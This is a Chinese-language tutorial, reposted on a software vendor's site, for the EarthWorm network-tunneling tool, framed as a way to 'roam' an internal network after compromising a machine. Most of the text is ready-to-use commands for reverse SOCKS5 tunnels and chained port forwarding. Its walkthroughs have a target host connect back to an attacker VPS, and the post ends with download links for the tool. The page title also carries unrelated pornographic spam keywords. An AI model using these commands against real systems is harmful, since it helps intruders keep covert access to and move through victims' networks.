狠狠色丁香婷婷综合尤物/久久精品综合一区二区三区/中国有色金属学报/国产日韩欧美在线观看 - 国产一区二区三区四区五区tv

LOGO OA教程 ERP教程 模切知識交流 PMS教程 CRM教程 開發文檔 其他文檔  
 
網站管理員

[點晴永久免費OA]內網穿透大殺器--EarthWorm

admin
2023年10月21日 12:33 本文熱度 1121

0x00 前言
當你在內網滲透,并且拿下一臺機器的權限時,你是不是覺得已經算是一次完整的滲透了?
不來一次內網漫游,滲透是不完整的,哈哈。

本文給大家推薦一款內網穿透神器EarthWorm,(簡稱EW)是一套輕量便攜且功能強大的網絡穿透工具,基于標準C開發,具有socks5代理、端口轉發和端口映射三大功能。


它強在哪些方面呢?
1.可穿透復雜的內網環境。(這么說吧:我本地連著路由器開一個虛擬機,可以直接反彈到公網的云服務器上。)
2.以支持多平臺間的轉接通訊,Linux、Windows、MacOS、Arm-Linux均支持。
支持平臺列表:(可跨平臺反彈)

1.  ew_for_Win.exe        適用各種Windows系統(X86指令集、X64指令集)        Windows7Windows XP

2.  ew_for_Linux32        各常見Linux發行版 (X86 指令集 CPU)        Ubuntu(X86)/BT5(X86)

3.  ew_for_linux64        各常見Linux發行版 (X64 指令集 CPU)        Ubuntu(X64)/Kali(X64)

4.  ew_for_MacOSX64       MacOS系統發行版 (X64 指令集)        蘋果PC電腦,蘋果server

5.  ew_for_Arm32          常見Arm-Linux系統        HTC New One(Arm-Android)/小米路由器(R1D)

6.  ew_mipsel             常見Mips-Linux系統 (Mipsel指令集 CPU)        螢石硬盤錄像機、小米mini路由器(R1CM)

0x01 使用方法
以下所有樣例,如無特殊說明代理端口均為1080,服務均為SOCKSv5代理服務.
該工具共有 6 種命令格式(ssocksd、rcsocks、rssocks、lcx_slave、lcx_listen、lcx_tran)。

1.正向SOCKS v5服務器

$ ./ew -s ssocksd -l 1080

2. 反彈 SOCKS v5 服務器
  這個操作具體分兩步:
  a) 先在一臺具有公網 ip 的主機A上運行以下命令:

$ ./ew -s rcsocks -l 1080 -e 8888

b) 在目標主機B上啟動 SOCKS v5 服務 并反彈到公網主機的 8888端口

$ ./ew -s rssocks -d 1.1.1.1 -e 8888

成功。
3. 多級級聯
工具中自帶的三條端口轉發指令,它們的參數格式分別為:

1.  $ ./ew -s lcx_listen -l  1080   -e 8888

2.  $ ./ew -s lcx_tran   -l  1080   -f 2.2.2.3 -g 9999

3.  $ ./ew -s lcx_slave  -d 1.1.1.1 -e 8888    -f 2.2.2.3  -g  9999

通過這些端口轉發指令可以將處于網絡深層的基于TCP的服務轉發至根前,比如 SOCKS v5。
首先提供兩個“二級級聯”本地SOCKS測試樣例:
  a) lcx_tran 的用法

1.  $ ./ew -s ssocksd  -l 9999

2.  $ ./ew -s lcx_tran -l 1080 -f 127.0.0.1 -g 9999

b) lcx_listen、lcx_slave 的用法

1.  $ ./ew -s lcx_listen -l 1080 -e 8888

2.  $ ./ew -s ssocksd    -l 9999

3.  $ ./ew -s lcx_slave  -d 127.0.0.1 -e 8888 -f 127.0.0.1 -g 9999 

再提供一個“三級級聯”的本地SOCKS測試用例以供參考

1.  $ ./ew -s rcsocks -l 1080 -e 8888

2.  $ ./ew -s lcx_slave -d 127.0.0.1 -e 8888 -f 127.0.0.1 -g 9999

3.  $ ./ew -s lcx_listen -l 9999 -e 7777

4.  $ ./ew -s rssocks -d 127.0.0.1 -e 7777

數據流向:SOCKS v5 -> 1080 -> 8888 -> 9999 -> 7777 -> rssocks

0x02 實戰測試(分為本地測試和公網IP測試)

一般最常用的就是上面的第二條:反彈 SOCKS v5 服務器。
使用實例1:
目標機器:

ew.exe -s rssocks -d 2.2.2.2 -e 888

(2.2.2.2為想要反彈到的機器)
攻擊機器:

ew.exe -s rcsocks -l 1008 -e 888

(監聽888端口,轉發到1008端口)
測試環境:
在這里我直接用我的本機Win10作為目標機器,將虛擬機Win7作為攻擊機器。

本機Win10 ip:192.168.62.1
Win7 ip:192.168.62.128

ew_for_Win.exe -s rcsocks -l 1008 -e 888

接收888端口的數據并轉發到1008端口。



此時正在監聽。

目標機器Win10運行命令:

ew_for_Win.exe -s rssocks -d 192.168.62.128 -e 888


此時攻擊機器會彈出連接成功的提示:
 

好了,到此Win10的SOCKS5代理就反彈到Win7攻擊機上了。
只需要一個Socks5連接工具就可以連接到本地1008端口來代理訪問了。
推薦工具SocksCap64。 

 在代理處配置127.0.0.1:1008,代理已連接。

使用實例2:
攻擊者洛杉磯 Linux VPS :45.78.*.*
目標阿里云服務器 Win2008:47.93.*.*

攻擊者Linux監聽:

[root@centos6 ~]# ./ew_for_Linux32 -s rcsocks -l 1008 -e 888

目標阿里云服務器反彈:

ew_for_Win.exe -s rssocks -d 45.78.*.* -e 888

攻擊機器監聽出現:rssocks cmd_socket OK!
表示反彈成功。

0x03 工具下載

http://rootkiter.com/EarthWorm/download/ew.zip
http://sw.bos.baidu.com/sw-search-sp/software/b4a67d595e031/sockscap64w_V3.3_setup.exe

相關教程:

EarthWorm(ew):復雜網絡環境下內網穿透、端口轉發及SOCKS5代理工具[17]
  http://21706.oa22.cn


該文章在 2023/10/21 16:05:46 編輯過
關鍵字查詢
相關文章
正在查詢...
點晴ERP是一款針對中小制造業的專業生產管理軟件系統,系統成熟度和易用性得到了國內大量中小企業的青睞。
點晴PMS碼頭管理系統主要針對港口碼頭集裝箱與散貨日常運作、調度、堆場、車隊、財務費用、相關報表等業務管理,結合碼頭的業務特點,圍繞調度、堆場作業而開發的。集技術的先進性、管理的有效性于一體,是物流碼頭及其他港口類企業的高效ERP管理信息系統。
點晴WMS倉儲管理系統提供了貨物產品管理,銷售管理,采購管理,倉儲管理,倉庫管理,保質期管理,貨位管理,庫位管理,生產管理,WMS管理系統,標簽打印,條形碼,二維碼管理,批號管理軟件。
點晴免費OA是一款軟件和通用服務都免費,不限功能、不限時間、不限用戶的免費OA協同辦公管理系統。
Copyright 2010-2025 ClickSun All Rights Reserved